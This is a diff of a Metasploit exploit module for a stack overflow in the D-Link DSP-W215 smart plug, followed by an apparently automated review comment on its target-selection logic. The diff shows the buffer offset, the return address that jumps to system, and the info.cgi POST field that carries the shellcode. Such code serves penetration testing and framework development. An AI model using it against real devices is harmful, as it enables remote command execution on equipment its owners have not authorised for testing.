@@ -24,26 +24,23 @@ def initialize(info = {})
24
24
'Michael Messner <devnull[at]s3cur1ty.de>' , # Metasploit module
25
25
] ,
26
26
'License' => MSF_LICENSE ,
27
- 'Platform' => [ 'linux' ] ,
27
+ 'Platform' => 'linux' ,
28
28
'Arch' => ARCH_MIPSBE ,
29
29
'References' =>
30
30
[
31
- [ 'CVE' , '2014-3936' ] ,
32
- [ 'BID' , '67651' ] ,
33
- [ 'URL' , 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ] , # blog post from Craig including PoC
34
- [ 'URL' , 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029' ]
31
+ [ 'OSVDB' , '108249' ] ,
32
+ [ 'URL' , 'http://www.devttys0.com/2014/05/hacking-the-dspw215-again/' ] # blog post from Craig including PoC
35
33
] ,
36
34
'Targets' =>
37
35
[
38
36
#
39
37
# Automatic targeting via fingerprinting
40
38
#
41
39
[ 'Automatic Targeting' , { 'auto' => true } ] ,
42
-
43
40
[ 'D-Link DSP-W215 - v1.02' ,
44
41
{
45
- 'Offset' => 477472 ,
46
- 'Ret' => "\x00 \x40 \x5C \xEC " , # jump to system - my_cgi.cgi
42
+ 'Offset' => 477472 ,
43
+ 'Ret' => "\x00 \x40 \x5C \xEC " # jump to system - my_cgi.cgi
47
44
}
48
45
]
49
46
] ,
@@ -57,6 +54,7 @@ def check
57
54
'uri' => "/common/info.cgi" ,
58
55
'method' => 'GET'
59
56
} )
57
+
60
58
if res && [ 200 , 301 , 302 ] . include? ( res . code )
61
59
62
60
# trying to automatically detect a vulnerable device
@@ -67,7 +65,7 @@ def check
67
65
68
66
self . targets . each do |t |
69
67
if ( t . name =~ /DSP-W215.*1.02/ ) then
70
- @mytarget = t
68
+ @my_target = t
71
69
break
72
70
end
73
71
end
@@ -95,16 +93,11 @@ def check
95
93
Exploit ::CheckCode ::Unknown
96
94
end
97
95
98
- def target
99
- return @mytarget if @mytarget
100
- super
101
- end
102
-
103
96
def exploit
104
97
print_status ( "#{ peer } - Trying to access the vulnerable URL..." )
105
98
106
99
# Use a copy of the target
107
- @mytarget = target
100
+ @my_target = target
108
101
109
102
unless check == Exploit ::CheckCode ::Detected
110
103
fail_with ( Failure ::Unknown , "#{ peer } - Failed to access the vulnerable URL" )
@@ -118,8 +111,8 @@ def exploit
118
111
end
119
112
120
113
def prepare_shellcode ( cmd )
121
- buf = rand_text_alpha_upper ( @mytarget [ 'Offset' ] ) # Stack filler
122
- buf << @mytarget [ 'Ret' ] # Overwrite $ra -> jump to system
114
+ buf = rand_text_alpha_upper ( @my_target [ 'Offset' ] ) # Stack filler
115
+ buf << @my_target . ret # Overwrite $ra -> jump to system
123
116
124
117
# la $t9, system
125
118
# la $s1, 0x440000
@@ -136,10 +129,10 @@ def execute_command(cmd, opts)
136
129
137
130
begin
138
131
res = send_request_cgi ( {
139
- 'method' => 'POST' ,
140
- 'uri' => "/common/info.cgi" ,
132
+ 'method' => 'POST' ,
133
+ 'uri' => "/common/info.cgi" ,
141
134
'encode_params' => false ,
142
- 'vars_post' => {
135
+ 'vars_post' => {
143
136
'storage_path' => shellcode ,
144
137
}
145
138
} )
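Review bot: With the `target` override removed, `prepare_shellcode` reads `@my_target['Offset']` and `@my_target.ret` while nothing in the visible hunks confirms that `@my_target` holds a concrete target rather than the 'Automatic Targeting' entry, whose options are only `{ 'auto' => true }`. `exploit` assigns `@my_target = target` before calling `check`, and only the fingerprint loop in `check` replaces it, so if `check` can return `Detected` without reaching that loop, the filler length is nil and the request is built for a device that was never positively identified. A guard right after the `check` call in `exploit` would make the failure explicit: `fail_with(Failure::NoTarget, "#{peer} - Unable to identify a supported target") if @my_target.nil? || @my_target['auto']`. `prepare_shellcode` also mixes hash-style and `.ret` access on the same object, and using one form for both reads would be easier to follow. The bodies of `check`, `exploit` and `prepare_shellcode` continue outside the hunks, so the existing control flow may already cover this case.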